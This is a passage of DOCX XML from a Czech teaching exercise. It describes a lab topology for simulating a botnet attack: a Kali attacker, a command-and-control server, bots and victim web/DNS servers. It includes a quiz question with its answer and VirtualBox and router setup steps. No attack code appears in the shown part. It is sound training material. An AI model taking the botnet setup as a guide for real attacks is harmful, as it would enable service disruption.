                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4882920" cy="3784681"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B7CFB" w14:textId="4F03DA8F" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve">Na </w:t>
      </w:r>
      <w:r w:rsidR="005C048C">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>brázku</w:t>
      </w:r>
      <w:r w:rsidR="005C048C">
        <w:t xml:space="preserve"> výše</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve"> je celá topologie </w:t>
      </w:r>
      <w:r>
        <w:t>práce</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve"> i s přiřazenými IP adresami. V tomto zapojení tedy bude komponovat Útočník, na kterém běží distribuce Kali (dostupná z: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:anchor="kali-virtual-machines" w:history="1">
        <w:r w:rsidRPr="00A0352B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>https://www.kali.org/get-kali/#kali-virtual-machines</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>), ze kterého budou pramenit útoky.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D62374" w14:textId="77777777" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>Centralizovaný CnC (Command and Control) server, ke kterému Útočník má root přístup a ze kterého se budou přeposílat útoky botnetu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF1E3D" w14:textId="77777777" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>Boti, kteří reprezentují infikované zařízení s přístupem na internet a jsou tedy spouštěči škodlivého kódu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C1AA5" w14:textId="0FEACFE6" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve">Tři routery s operačním systémem RouterOS (dostupný z: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00A0352B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>https://mikrotik.com/download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a U</w:t>
      </w:r>
      <w:r w:rsidR="005C048C">
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>untu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve">, mají simulovat internet a umožnit load </w:t>
      </w:r>
      <w:r w:rsidR="00370D9C" w:rsidRPr="00FB4D6F">
        <w:t>balancing,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve"> pokud je potřeba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D21CC5" w14:textId="3B163E07" w:rsidR="00FB4D6F" w:rsidRDefault="00FB4D6F" w:rsidP="00FB4D6F">
      <w:r w:rsidRPr="00FB4D6F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A samotné servery oběti, na kterých běží HTTP služba Apache a DNS služba Bind na překlad adresy z druhého serveru. Jak </w:t>
      </w:r>
      <w:r w:rsidR="005C048C" w:rsidRPr="00FB4D6F">
        <w:t>Boti,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve"> tak servery běží převážně na </w:t>
      </w:r>
      <w:r w:rsidR="00370D9C">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t xml:space="preserve">buntu (dostupný z: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00A0352B">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>https://ubuntu.com/download/server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FB4D6F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43856D3F" w14:textId="1AB2625F" w:rsidR="009A75C7" w:rsidRDefault="009A75C7" w:rsidP="00FB4D6F">
      <w:r>
        <w:t>Otázka 1.1:</w:t>
      </w:r>
      <w:r w:rsidR="00A87B88">
        <w:t xml:space="preserve"> Na základě topologie a jejích popiscích, jaký je maximální počet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A87B88">
        <w:t>botů</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A87B88">
        <w:t xml:space="preserve"> v botnetu, pokud </w:t>
      </w:r>
      <w:r w:rsidR="008051DB">
        <w:t>první bot dostane adresu 192.1.1.11?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA76082" w14:textId="3011F5D3" w:rsidR="008051DB" w:rsidRPr="008051DB" w:rsidRDefault="008051DB" w:rsidP="008051DB">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E04885">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Celkem jich může být 244, protože </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>256 – 2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (adresa sítě a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>broadcast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>) – 10 (prvních 10 použitelných adres pokud začínáme na 192.1.1.11))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835FF1E" w14:textId="7C31EB82" w:rsidR="005C048C" w:rsidRDefault="005C048C" w:rsidP="005C048C">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc192341160"/>
      <w:r>
        <w:t xml:space="preserve">Část </w:t>
      </w:r>
      <w:r w:rsidR="009A75C7">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,5. </w:t>
      </w:r>
      <w:r w:rsidR="00022F94">
        <w:t>Replikace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> topologie (</w:t>
      </w:r>
      <w:r w:rsidR="00920038">
        <w:t>Jen zajímavost</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="584421D8" w14:textId="74388FFB" w:rsidR="00A87B88" w:rsidRPr="00A87B88" w:rsidRDefault="00A87B88" w:rsidP="00A87B88">
      <w:r>
        <w:t>! - Tato část není potřebná k cvičení. Je tu jen ze zajímavosti, jak se konfigurovala síťová komunikace v této topologii. Pokud chcete dále pokračovat vedle nadpisu si můžete celou kapitolu „zabalit“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C89AFA4" w14:textId="1025C13F" w:rsidR="00370D9C" w:rsidRDefault="00370D9C" w:rsidP="009A75C7">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc192341161"/>
      <w:r>
        <w:t xml:space="preserve">Krok 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="009A75C7">
        <w:t>Stáhnutí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a virtualizace strojů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1F70F7ED" w14:textId="389F1B97" w:rsidR="00370D9C" w:rsidRDefault="00370D9C" w:rsidP="00370D9C">
      <w:r>
        <w:t xml:space="preserve">V uvedených </w:t>
      </w:r>
      <w:r w:rsidR="00022F94">
        <w:t>odkazech</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> minule si stáhněte vždy jen jeden soubor. Kali a RouterOS jdou stáhnout rovnou jako import do VirtualBoxu, ale ubuntu server se musí stáhnout jako .ios soubor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30250851" w14:textId="2186C18F" w:rsidR="00370D9C" w:rsidRDefault="00370D9C" w:rsidP="00370D9C">
      <w:r>
        <w:t xml:space="preserve">Po stáhnutí Kali a RouterOS stačí jen otevřít </w:t>
      </w:r>
      <w:r w:rsidR="00D12324">
        <w:t xml:space="preserve">(poklepat) </w:t>
      </w:r>
      <w:r>
        <w:t>a začne import</w:t>
      </w:r>
      <w:r w:rsidR="00D12324">
        <w:t>. Pro Ubuntu jděte do VirtualBoxu a klepněte na nový.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3480B1" w14:textId="32644F0B" w:rsidR="00D12324" w:rsidRDefault="00D12324" w:rsidP="00370D9C">
      <w:r w:rsidRPr="00D12324">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3932E9" wp14:editId="2662ED49">
            <wp:extent cx="3391373" cy="1124107"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76575379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53797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3391373" cy="1124107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497AF5A" w14:textId="7F022447" w:rsidR="00D12324" w:rsidRDefault="00D12324" w:rsidP="00370D9C">
      <w:r>
        <w:t>Vyplňte všechny potřebné informace jako jméno, místo staženého .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> souboru a ve položce hardware zvolte 10GB místa (v budoucnu budeme dělat co nejvíce propojených klonů pro co největší ušetření místa).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1939155B" w14:textId="5F6C5CB2" w:rsidR="00D12324" w:rsidRDefault="00D12324" w:rsidP="00370D9C">
      <w:r>
        <w:t xml:space="preserve">Každý stroj by měl už tedy jít spustit. (defaultní jméno/heslo pro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pro RouterOS není nastavené žádné a pro Ubuntu při instalačce si nastavíte vlastní (doporučuji nějaké krátké a lehce zapamatovatelné)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0A1CBC" w14:textId="00DDD3AC" w:rsidR="00D12324" w:rsidRDefault="00497EDB" w:rsidP="00497EDB">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc192341162"/>
      <w:r>
        <w:t xml:space="preserve">Krok 2. </w:t>
      </w:r>
      <w:r w:rsidR="0071545E">
        <w:t>Nastavení síťových karet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071545E">
        <w:t>ve VB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4A0764C6" w14:textId="1EE96AA0" w:rsidR="00497EDB" w:rsidRDefault="00497EDB" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Pro každou „cestu“ je potřeba založit novou interní síť a přiřadit ji ke síťové kartě. Např.: u routeru </w:t>
      </w:r>
      <w:r w:rsidR="0071545E">
        <w:t xml:space="preserve">R1 (jediný RouterOS) </w:t>
      </w:r>
      <w:r>
        <w:t>bude síťové pole ve VirtualBoxu vypadat takto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030FB7D2" w14:textId="65ACFF7A" w:rsidR="00497EDB" w:rsidRDefault="00497EDB" w:rsidP="00497EDB">
      <w:r w:rsidRPr="00497EDB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38D1DF89" wp14:editId="66795A0B">
            <wp:extent cx="5020376" cy="1114581"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="9725879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87931" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5020376" cy="1114581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE8538" w14:textId="38EFFB2A" w:rsidR="00853A41" w:rsidRDefault="00853A41" w:rsidP="00853A41">
      <w:r>
        <w:t xml:space="preserve">Pro nastavení páté síťové karty musíme zadat do našeho terminálu tento command (nejlépe v umístění </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirualBoxu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (defaultně ve C:\Program </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Oracle\VirtualBox\)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C201E3D" w14:textId="00B5DD89" w:rsidR="00853A41" w:rsidRDefault="00853A41" w:rsidP="00871F40">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.\VBoxManage.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifyvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">Jméno R1 routeru&gt;“ </w:t>
      </w:r>
      <w:r w:rsidR="00871F40">
        <w:t xml:space="preserve">--nic5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00871F40">
        <w:t>none</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50C4D0A4" w14:textId="2D8A8BDE" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00871F40">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Nakonec změnit na potřebný typ ve VirtualBoxu poklepáním na část ve závorce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197456C" w14:textId="232E14FB" w:rsidR="00A87B88" w:rsidRPr="00A87B88" w:rsidRDefault="0071545E" w:rsidP="00A87B88">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc192341163"/>
      <w:r>
        <w:t>Krok 3. Komunikace (routery)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7F55CF9D" w14:textId="413CBF68" w:rsidR="00497EDB" w:rsidRDefault="0071545E" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Po spuštění RouterOS, který bude naším „hlavním“ routerem, se vám ukáže CLI rozhraní. Buď můžete konfigurovat přes to, nebo se k němu připojíme přes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (dostupný z: </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00283D8C">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>https://mikrotik.com/download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>), abychom mohli konfigurovat ve grafickém rozhraní.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B85D54" w14:textId="072798FF" w:rsidR="0071545E" w:rsidRDefault="0071545E" w:rsidP="00497EDB">
      <w:r>
        <w:t>Dejte si pozor abyste ve síťovém menu měly povolen síťový most, aby šel router vidět.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83A05E" w14:textId="24151ECE" w:rsidR="004508FB" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Ve IP -&gt; DHCP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vytvoříme základního klienta (stačí dát rozhraní, které slouží jako síťový most (pokud si nejste jistí můžete se kouknout do kolonky Interfaces a kde bude provoz, to je síťový most))</w:t>
      </w:r>
      <w:r w:rsidR="004B43FA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC3183" w14:textId="6AFDF3EC" w:rsidR="0071545E" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Ve IP -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Addresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vytvoříme adresy podle schématu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EBE7F6" w14:textId="42D81CCB" w:rsidR="004508FB" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r>
        <w:t>Celý adresový list by měl vypadat nějak takto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC7527" w14:textId="0E0821F4" w:rsidR="004508FB" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r w:rsidRPr="004508FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="690B3354" wp14:editId="6DBD055D">
            <wp:extent cx="3753374" cy="1781424"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="179313274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32748" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3753374" cy="1781424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63254BF3" w14:textId="427B2265" w:rsidR="004508FB" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Ve IP -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>routes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nastavíme routy do vzdálených sítí (ze schématu je vidět, že vzdálená sítě budou pro nás jenom sítě serverů a botnetu</w:t>
      </w:r>
      <w:r w:rsidR="004B43FA">
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Celý list by měl vypadat takto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A113D5B" w14:textId="7C6EDAA7" w:rsidR="004508FB" w:rsidRDefault="004508FB" w:rsidP="00497EDB">
      <w:r w:rsidRPr="004508FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C733DA" wp14:editId="4C1CFD59">
            <wp:extent cx="5220429" cy="1781424"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="134965875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58754" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5220429" cy="1781424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453925F" w14:textId="4576F4D0" w:rsidR="004508FB" w:rsidRDefault="004B43FA" w:rsidP="00497EDB">
      <w:r>
        <w:t>Nakonec abychom měli sice pomalou ale nějakou automatickou komunikaci do internetu v síti, tak je potřeba ještě nastavit NAT ve IP -&gt; firewall a kolonce NAT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7621DD" w14:textId="588A6571" w:rsidR="004508FB" w:rsidRDefault="004B43FA" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Ve vytváření nás zajímají jen 3 pole. Ve General pole </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, který bude </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcnat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Out. Interface, který je náš síťový most. A v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zvolíme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>masquerade</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3911C" w14:textId="45855564" w:rsidR="004B43FA" w:rsidRDefault="004B43FA" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Pro další dva routery zvolíme ubuntu, protože zdarma verze RouterOS má limit na </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1Mb/s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4A357" w14:textId="4274A086" w:rsidR="004B43FA" w:rsidRDefault="004B43FA" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Ještě </w:t>
      </w:r>
      <w:r w:rsidR="00853A41">
        <w:t>předtím,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> než naklonujeme ubuntu, tak </w:t>
      </w:r>
      <w:r w:rsidR="00853A41">
        <w:t>na naše základní přidáme síťový most abychom měli rychlou konektivitu do internetu a nainstalujeme na něj nástroj nmtui pro konfiguraci síťových parametrů (budeme využívat i u koncových zařízení).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7C81DC" w14:textId="21433DFA" w:rsidR="00853A41" w:rsidRDefault="00853A41" w:rsidP="00497EDB">
      <w:r>
        <w:t>Poté můžeme naklonovat a upravit síťové karty</w:t>
      </w:r>
      <w:r w:rsidR="00871F40">
        <w:t xml:space="preserve"> ve VB</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C33E0" w14:textId="5BFF8509" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00497EDB">
      <w:r>
        <w:t xml:space="preserve">Po spuštění nmtui dáme </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection a přidáme potřebné rozhraní. Např.: u routeru R2 budou rozhraní vypadat následovně:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29145B65" w14:textId="158F7605" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00497EDB">
      <w:r w:rsidRPr="00871F40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BAF4887" wp14:editId="74E372AD">
            <wp:extent cx="4873925" cy="1578534"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="32091821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18217" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4882577" cy="1581336"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CC257" w14:textId="719E66C1" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00497EDB">
      <w:r w:rsidRPr="00871F40">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D8F24C" wp14:editId="718A3052">
            <wp:extent cx="4917057" cy="4017797"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="5809618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1877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4924914" cy="4024217"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6E1A4" w14:textId="700A5A2F" w:rsidR="00871F40" w:rsidRDefault="00871F40" w:rsidP="00497EDB">
      <w:r w:rsidRPr="00871F40">
        <w:rPr>
